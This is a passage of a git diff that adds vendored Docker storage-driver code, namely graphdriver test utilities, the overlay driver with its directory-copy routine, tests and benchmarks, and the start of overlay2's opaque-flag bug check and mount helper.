+func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil { + return err + } + layerDir := path.Join(root, 
fmt.Sprintf("layer-%d", i)) + if err := os.MkdirAll(layerDir, 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil { + return err + } + + return nil +} + +func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) { + lastLayer := baseLayer + for i := 1; i <= count; i++ { + nextLayer := stringid.GenerateRandomID() + if err := drv.Create(nextLayer, lastLayer, nil); err != nil { + return "", err + } + if err := addLayerFiles(drv, nextLayer, lastLayer, i); err != nil { + return "", err + } + + lastLayer = nextLayer + + } + return lastLayer, nil +} + +func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id")) + if err != nil { + return err + } + + if bytes.Compare(layerIDBytes, []byte(layer)) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer)) + } + + for i := count; i > 0; i-- { + layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) + + thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id")) + if err != nil { + return err + } + if bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes) + } + layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id")) + if err != nil { + return err + } + } + return nil +} + +// readDir reads a directory just like ioutil.ReadDir() +// then hides specific files (currently "lost+found") +// so the tests don't "see" it +func readDir(dir string) ([]os.FileInfo, error) { + a, err := ioutil.ReadDir(dir) + if err != nil { + return nil, err + } + + b := a[:0] + for _, x := range a 
{ + if x.Name() != "lost+found" { // ext4 always have this dir + b = append(b, x) + } + } + + return b, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go new file mode 100644 index 0000000000..49b0c2cc35 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go @@ -0,0 +1,143 @@ +// +build linux freebsd + +package graphtest + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "syscall" + "testing" + + "github.com/docker/docker/daemon/graphdriver" +) + +// InitLoopbacks ensures that the loopback devices are properly created within +// the system running the device mapper tests. +func InitLoopbacks() error { + statT, err := getBaseLoopStats() + if err != nil { + return err + } + // create at least 8 loopback files, ya, that is a good number + for i := 0; i < 8; i++ { + loopPath := fmt.Sprintf("/dev/loop%d", i) + // only create new loopback files if they don't exist + if _, err := os.Stat(loopPath); err != nil { + if mkerr := syscall.Mknod(loopPath, + uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { + return mkerr + } + os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) + } + } + return nil +} + +// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the +// loop0 device on the system. 
If it does not exist we assume 0,0,0660 for the +// stat data +func getBaseLoopStats() (*syscall.Stat_t, error) { + loop0, err := os.Stat("/dev/loop0") + if err != nil { + if os.IsNotExist(err) { + return &syscall.Stat_t{ + Uid: 0, + Gid: 0, + Mode: 0660, + }, nil + } + return nil, err + } + return loop0.Sys().(*syscall.Stat_t), nil +} + +func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) { + fi, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + + if fi.Mode()&os.ModeType != mode&os.ModeType { + t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType) + } + + if fi.Mode()&os.ModePerm != mode&os.ModePerm { + t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm) + } + + if fi.Mode()&os.ModeSticky != mode&os.ModeSticky { + t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky) + } + + if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid { + t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid) + } + + if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid { + t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid) + } + + if stat, ok := fi.Sys().(*syscall.Stat_t); ok { + if stat.Uid != uid { + t.Fatalf("%s no owned by uid %d", path, uid) + } + if stat.Gid != gid { + t.Fatalf("%s not owned by gid %d", path, gid) + } + } +} + +func createBase(t testing.TB, driver graphdriver.Driver, name string) { + // We need to be able to set any perms + oldmask := syscall.Umask(0) + defer syscall.Umask(oldmask) + + if err := driver.CreateReadWrite(name, "", nil); err != nil { + t.Fatal(err) + } + + dir, err := driver.Get(name, "") + if err != nil { + t.Fatal(err) + } + defer driver.Put(name) + + subdir := path.Join(dir, "a subdir") + if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil { + t.Fatal(err) + } + if err := os.Chown(subdir, 1, 2); err != nil { + 
t.Fatal(err) + } + + file := path.Join(dir, "a file") + if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil { + t.Fatal(err) + } +} + +func verifyBase(t testing.TB, driver graphdriver.Driver, name string) { + dir, err := driver.Get(name, "") + if err != nil { + t.Fatal(err) + } + defer driver.Put(name) + + subdir := path.Join(dir, "a subdir") + verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2) + + file := path.Join(dir, "a file") + verifyFile(t, file, 0222|os.ModeSetuid, 0, 0) + + fis, err := readDir(dir) + if err != nil { + t.Fatal(err) + } + + if len(fis) != 2 { + t.Fatal("Unexpected files in base image") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go new file mode 100644 index 0000000000..666a5c0e04 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go @@ -0,0 +1,174 @@ +// +build linux + +package overlay + +import ( + "fmt" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +type copyFlags int + +const ( + copyHardlink copyFlags = 1 << iota +) + +func copyRegular(srcPath, dstPath string, mode os.FileMode) error { + srcFile, err := os.Open(srcPath) + if err != nil { + return err + } + defer srcFile.Close() + + dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode) + if err != nil { + return err + } + defer dstFile.Close() + + _, err = pools.Copy(dstFile, srcFile) + + return err +} + +func copyXattr(srcPath, dstPath, attr string) error { + data, err := system.Lgetxattr(srcPath, attr) + if err != nil { + return err + } + if data != nil { + if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { + return err + } + } + return nil +} + +func copyDir(srcDir, dstDir string, flags copyFlags) error { + err := 
filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + if err != nil { + return err + } + + dstPath := filepath.Join(dstDir, relPath) + if err != nil { + return err + } + + stat, ok := f.Sys().(*syscall.Stat_t) + if !ok { + return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) + } + + isHardlink := false + + switch f.Mode() & os.ModeType { + case 0: // Regular file + if flags&copyHardlink != 0 { + isHardlink = true + if err := os.Link(srcPath, dstPath); err != nil { + return err + } + } else { + if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil { + return err + } + } + + case os.ModeDir: + if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { + return err + } + + case os.ModeSymlink: + link, err := os.Readlink(srcPath) + if err != nil { + return err + } + + if err := os.Symlink(link, dstPath); err != nil { + return err + } + + case os.ModeNamedPipe: + fallthrough + case os.ModeSocket: + if rsystem.RunningInUserNS() { + // cannot create a device if running in user namespace + return nil + } + if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil { + return err + } + + case os.ModeDevice: + if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { + return err + } + + default: + return fmt.Errorf("Unknown file type for %s\n", srcPath) + } + + // Everything below is copying metadata from src to dst. All this metadata + // already shares an inode for hardlinks. + if isHardlink { + return nil + } + + if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { + return err + } + + if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { + return err + } + + // We need to copy this attribute if it appears in an overlay upper layer, as + // this function is used to copy those. 
It is set by overlay if a directory + // is removed and then re-created and should not inherit anything from the + // same dir in the lower dir. + if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil { + return err + } + + isSymlink := f.Mode()&os.ModeSymlink != 0 + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if !isSymlink { + if err := os.Chmod(dstPath, f.Mode()); err != nil { + return err + } + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + if !isSymlink { + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) + if err := system.Chtimes(dstPath, aTime, mTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{stat.Atim, stat.Mtim} + if err := system.LUtimesNano(dstPath, ts); err != nil { + return err + } + } + return nil + }) + return err +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go new file mode 100644 index 0000000000..121b72e2c3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go @@ -0,0 +1,462 @@ +// +build linux + +package overlay + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "strconv" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/overlayutils" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fsutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/opencontainers/runc/libcontainer/label" +) + +// This is a small wrapper over the NaiveDiffWriter that lets us have a custom +// implementation of ApplyDiff() + +var ( + // ErrApplyDiffFallback is returned to indicate that a normal ApplyDiff is applied as a 
fallback from Naive diff writer. + ErrApplyDiffFallback = fmt.Errorf("Fall back to normal ApplyDiff") + backingFs = "" +) + +// ApplyDiffProtoDriver wraps the ProtoDriver by extending the interface with ApplyDiff method. +type ApplyDiffProtoDriver interface { + graphdriver.ProtoDriver + // ApplyDiff writes the diff to the archive for the given id and parent id. + // It returns the size in bytes written if successful, an error ErrApplyDiffFallback is returned otherwise. + ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) +} + +type naiveDiffDriverWithApply struct { + graphdriver.Driver + applyDiff ApplyDiffProtoDriver +} + +// NaiveDiffDriverWithApply returns a NaiveDiff driver with custom ApplyDiff. +func NaiveDiffDriverWithApply(driver ApplyDiffProtoDriver, uidMaps, gidMaps []idtools.IDMap) graphdriver.Driver { + return &naiveDiffDriverWithApply{ + Driver: graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), + applyDiff: driver, + } +} + +// ApplyDiff creates a diff layer with either the NaiveDiffDriver or with a fallback. +func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + b, err := d.applyDiff.ApplyDiff(id, parent, diff) + if err == ErrApplyDiffFallback { + return d.Driver.ApplyDiff(id, parent, diff) + } + return b, err +} + +// This backend uses the overlay union filesystem for containers +// plus hard link file sharing for images. + +// Each container/image can have a "root" subdirectory which is a plain +// filesystem hierarchy, or they can use overlay. + +// If they use overlay there is a "upper" directory and a "lower-id" +// file, as well as "merged" and "work" directories. The "upper" +// directory has the upper layer of the overlay, and "lower-id" contains +// the id of the parent whose "root" directory shall be used as the lower +// layer in the overlay. The overlay itself is mounted in the "merged" +// directory, and the "work" dir is needed for overlay to work. 
+ +// When an overlay layer is created there are two cases, either the +// parent has a "root" dir, then we start out with an empty "upper" +// directory overlaid on the parents root. This is typically the +// case with the init layer of a container which is based on an image. +// If there is no "root" in the parent, we inherit the lower-id from +// the parent and start by making a copy in the parent's "upper" dir. +// This is typically the case for a container layer which copies +// its parent -init upper layer. + +// Additionally we also have a custom implementation of ApplyLayer +// which makes a recursive copy of the parent "root" layer using +// hardlinks to share file data, and then applies the layer on top +// of that. This means all child images share file (but not directory) +// data with the parent. + +// Driver contains information about the home directory and the list of active mounts that are created using this driver. +type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + supportsDType bool +} + +func init() { + graphdriver.Register("overlay", Init) +} + +// Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. +// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. 
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + if err := supportsOverlay(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + switch fsMagic { + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs: + logrus.Errorf("'overlay' is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + // Create the driver home dir + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + supportsDType, err := fsutils.SupportsDType(home) + if err != nil { + return nil, err + } + if !supportsDType { + // not a fatal error until v1.16 (#27443) + logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) + } + + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), + supportsDType: supportsDType, + } + + return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil +} + +func supportsOverlay() error { + // We can try to modprobe overlay first before looking at + // proc/filesystems for when overlay is supported + exec.Command("modprobe", "overlay").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if s.Text() == "nodev\toverlay" { + return nil + } + } + logrus.Error("'overlay' not found as a supported filesystem on this host. 
Please ensure kernel is new enough and has overlay support loaded.") + return graphdriver.ErrNotSupported +} + +func (d *Driver) String() string { + return "overlay" +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Backing Filesystem" used in this implementation. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Backing Filesystem", backingFs}, + {"Supports d_type", strconv.FormatBool(d.supportsDType)}, + } +} + +// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return nil, err + } + + metadata := make(map[string]string) + + // If id has a root, it is an image + rootDir := path.Join(dir, "root") + if _, err := os.Stat(rootDir); err == nil { + metadata["RootDir"] = rootDir + return metadata, nil + } + + lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) + if err != nil { + return nil, err + } + + metadata["LowerDir"] = path.Join(d.dir(string(lowerID)), "root") + metadata["UpperDir"] = path.Join(dir, "upper") + metadata["WorkDir"] = path.Join(dir, "work") + metadata["MergedDir"] = path.Join(dir, "merged") + + return metadata, nil +} + +// Cleanup any state created by overlay which should be cleaned when daemon +// is being shutdown. For now, we just have to unmount the bind mounted +// we had created. +func (d *Driver) Cleanup() error { + return mount.Unmount(d.home) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. 
+// The parent filesystem is used to configure these directories for the overlay. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { + + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for overlay") + } + + dir := d.dir(id) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + return err + } + + defer func() { + // Clean up on failure + if retErr != nil { + os.RemoveAll(dir) + } + }() + + // Toplevel images are just a "root" dir + if parent == "" { + if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil { + return err + } + return nil + } + + parentDir := d.dir(parent) + + // Ensure parent exists + if _, err := os.Lstat(parentDir); err != nil { + return err + } + + // If parent has a root, just do an overlay to it + parentRoot := path.Join(parentDir, "root") + + if s, err := os.Lstat(parentRoot); err == nil { + if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil { + return err + } + return nil + } + + // Otherwise, copy the upper and the lower-id from the parent + + lowerID, err := ioutil.ReadFile(path.Join(parentDir, "lower-id")) + if err != nil { + return err + } + + if err := ioutil.WriteFile(path.Join(dir, "lower-id"), lowerID, 0666); err != nil { + return err + } + + parentUpperDir := path.Join(parentDir, "upper") + s, err := os.Lstat(parentUpperDir) + if err 
!= nil { + return err + } + + upperDir := path.Join(dir, "upper") + if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + return err + } + + return copyDir(parentUpperDir, upperDir, 0) +} + +func (d *Driver) dir(id string) string { + return path.Join(d.home, id) +} + +// Remove cleans the directories that are created for this id. +func (d *Driver) Remove(id string) error { + if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get creates and mounts the required file system for the given id and returns the mount path. +func (d *Driver) Get(id string, mountLabel string) (s string, err error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return "", err + } + // If id has a root, just return it + rootDir := path.Join(dir, "root") + if _, err := os.Stat(rootDir); err == nil { + return rootDir, nil + } + mergedDir := path.Join(dir, "merged") + if count := d.ctr.Increment(mergedDir); count > 1 { + return mergedDir, nil + } + defer func() { + if err != nil { + if c := d.ctr.Decrement(mergedDir); c <= 0 { + syscall.Unmount(mergedDir, 0) + } + } + }() + lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) + if err != nil { + return "", err + } + var ( + lowerDir = path.Join(d.dir(string(lowerID)), "root") + upperDir = path.Join(dir, "upper") + workDir = path.Join(dir, "work") + opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir) + ) + if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { + return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + } + // chown "workdir/work" to the remapped root UID/GID. 
Overlay fs inside a + // user namespace requires this to move a directory from lower to upper. + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return "", err + } + if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { + return "", err + } + return mergedDir, nil +} + +// Put unmounts the mount path created for the give id. +func (d *Driver) Put(id string) error { + // If id has a root, just return + if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil { + return nil + } + mountpoint := path.Join(d.dir(id), "merged") + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + if err := syscall.Unmount(mountpoint, 0); err != nil { + logrus.Debugf("Failed to unmount %s overlay: %v", id, err) + } + return nil +} + +// ApplyDiff applies the new layer on top of the root, if parent does not exist with will return an ErrApplyDiffFallback error. +func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) { + dir := d.dir(id) + + if parent == "" { + return 0, ErrApplyDiffFallback + } + + parentRootDir := path.Join(d.dir(parent), "root") + if _, err := os.Stat(parentRootDir); err != nil { + return 0, ErrApplyDiffFallback + } + + // We now know there is a parent, and it has a "root" directory containing + // the full root filesystem. We can just hardlink it and apply the + // layer. 
This relies on two things: + // 1) ApplyDiff is only run once on a clean (no writes to upper layer) container + // 2) ApplyDiff doesn't do any in-place writes to files (would break hardlinks) + // These are all currently true and are not expected to break + + tmpRootDir, err := ioutil.TempDir(dir, "tmproot") + if err != nil { + return 0, err + } + defer func() { + if err != nil { + os.RemoveAll(tmpRootDir) + } else { + os.RemoveAll(path.Join(dir, "upper")) + os.RemoveAll(path.Join(dir, "work")) + os.RemoveAll(path.Join(dir, "merged")) + os.RemoveAll(path.Join(dir, "lower-id")) + } + }() + + if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil { + return 0, err + } + + options := &archive.TarOptions{UIDMaps: d.uidMaps, GIDMaps: d.gidMaps} + if size, err = graphdriver.ApplyUncompressedLayer(tmpRootDir, diff, options); err != nil { + return 0, err + } + + rootDir := path.Join(dir, "root") + if err := os.Rename(tmpRootDir, rootDir); err != nil { + return 0, err + } + + return +} + +// Exists checks to see if the id is already mounted. +func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go new file mode 100644 index 0000000000..34b6d801fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go @@ -0,0 +1,93 @@ +// +build linux + +package overlay + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/archive" +) + +func init() { + // Do not sure chroot to speed run time and allow archive + // errors or hangs to be debugged directly from the test process. 
+ graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown +func TestOverlaySetup(t *testing.T) { + graphtest.GetDriver(t, "overlay") +} + +func TestOverlayCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "overlay") +} + +func TestOverlayCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "overlay") +} + +func TestOverlayCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "overlay") +} + +func TestOverlay50LayerRead(t *testing.T) { + graphtest.DriverTestDeepLayerRead(t, 50, "overlay") +} + +// Fails due to bug in calculating changes after apply +// likely related to https://github.com/docker/docker/issues/21555 +func TestOverlayDiffApply10Files(t *testing.T) { + t.Skipf("Fails to compute changes after apply intermittently") + graphtest.DriverTestDiffApply(t, 10, "overlay") +} + +func TestOverlayChanges(t *testing.T) { + t.Skipf("Fails to compute changes intermittently") + graphtest.DriverTestChanges(t, "overlay") +} + +func TestOverlayTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +// Benchmarks should always setup new driver + +func BenchmarkExists(b *testing.B) { + graphtest.DriverBenchExists(b, "overlay") +} + +func BenchmarkGetEmpty(b *testing.B) { + graphtest.DriverBenchGetEmpty(b, "overlay") +} + +func BenchmarkDiffBase(b *testing.B) { + graphtest.DriverBenchDiffBase(b, "overlay") +} + +func BenchmarkDiffSmallUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10, "overlay") +} + +func BenchmarkDiff10KFileUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10000, "overlay") +} + +func BenchmarkDiff10KFilesBottom(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10000, 10, "overlay") +} + +func BenchmarkDiffApply100(b *testing.B) { + graphtest.DriverBenchDiffApplyN(b, 100, "overlay") +} + +func BenchmarkDiff20Layers(b *testing.B) { + 
graphtest.DriverBenchDeepLayerDiff(b, 20, "overlay") +} + +func BenchmarkRead20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerRead(b, 20, "overlay") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go new file mode 100644 index 0000000000..3dbb4de44e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package overlay diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go new file mode 100644 index 0000000000..53a7199292 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go @@ -0,0 +1,79 @@ +// +build linux + +package overlay2 + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// hasOpaqueCopyUpBug checks whether the filesystem has a bug +// which copies up the opaque flag when copying up an opaque +// directory. When this bug exists naive diff should be used. 
+func hasOpaqueCopyUpBug(d string) error { + td, err := ioutil.TempDir(d, "opaque-bug-check") + if err != nil { + return err + } + defer func() { + if err := os.RemoveAll(td); err != nil { + logrus.Warnf("Failed to remove check directory %v: %v", td, err) + } + }() + + // Make directories l1/d, l2/d, l3, work, merged + if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil { + return err + } + if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "l3"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "work"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "merged"), 0755); err != nil { + return err + } + + // Mark l2/d as opaque + if err := system.Lsetxattr(filepath.Join(td, "l2", "d"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + return errors.Wrap(err, "failed to set opaque flag on middle layer") + } + + opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work")) + if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + return errors.Wrap(err, "failed to mount overlay") + } + defer func() { + if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil { + logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + } + }() + + // Touch file in d to force copy up of opaque directory "d" from "l2" to "l3" + if err := ioutil.WriteFile(filepath.Join(td, "merged", "d", "f"), []byte{}, 0644); err != nil { + return errors.Wrap(err, "failed to write to merged directory") + } + + // Check l3/d does not have opaque flag + xattrOpaque, err := system.Lgetxattr(filepath.Join(td, "l3", "d"), "trusted.overlay.opaque") + if err != nil { + return errors.Wrap(err, "failed to read opaque flag on upper layer") + } + if string(xattrOpaque) == "y" { + return 
errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix") + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go new file mode 100644 index 0000000000..60e248b6d7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go @@ -0,0 +1,88 @@ +// +build linux + +package overlay2 + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "os" + "runtime" + "syscall" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Register("docker-mountfrom", mountFromMain) +} + +func fatal(err error) { + fmt.Fprint(os.Stderr, err) + os.Exit(1) +} + +type mountOptions struct { + Device string + Target string + Type string + Label string + Flag uint32 +} + +func mountFrom(dir, device, target, mType string, flags uintptr, label string) error { + options := &mountOptions{ + Device: device, + Target: target, + Type: mType, + Flag: uint32(flags), + Label: label, + } + + cmd := reexec.Command("docker-mountfrom", dir) + w, err := cmd.StdinPipe() + if err != nil { + return fmt.Errorf("mountfrom error on pipe creation: %v", err) + } + + output := bytes.NewBuffer(nil) + cmd.Stdout = output + cmd.Stderr = output + + if err := cmd.Start(); err != nil { + return fmt.Errorf("mountfrom error on re-exec cmd: %v", err) + } + //write the options to the pipe for the untar exec to read + if err := 